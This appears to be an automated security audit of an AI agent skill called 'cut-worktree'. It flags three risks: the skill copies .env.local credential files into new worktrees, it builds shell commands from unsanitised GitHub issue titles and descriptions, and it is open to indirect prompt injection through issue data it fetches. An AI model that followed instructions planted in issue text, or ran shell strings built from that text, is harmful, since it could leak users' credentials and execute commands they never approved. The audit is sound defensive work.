cut-worktree
Warn
Audited by Gen Agent Trust Hub on Mar 17, 2026
Risk Level: MEDIUMCOMMAND_EXECUTIONCREDENTIALS_UNSAFEPROMPT_INJECTION
Full Analysis
- [CREDENTIALS_UNSAFE]: The skill includes logic to copy .env.local files to newly created worktree directories. These files frequently contain sensitive information such as API keys and credentials, increasing the risk of exposure through unintended file proliferation.- [COMMAND_EXECUTION]: The skill executes shell commands using the git and gh CLI tools. It directly interpolates external data, such as GitHub issue titles and descriptions, into shell command strings, which creates a significant surface for command injection if the external content is maliciously crafted.- [PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection through the ingestion of external GitHub issue data.
- Ingestion points: External data is fetched from GitHub using gh issue view (Step 2).
- Boundary markers: No delimiters or safety instructions are used when interpolating issue content into commands or PR bodies.
- Capability inventory: The skill possesses command execution (git, gh) and file system access (cp) capabilities (Step 5).
- Sanitization: The skill does not perform any escaping, validation, or sanitization of the retrieved issue content before processing.
Audit Metadata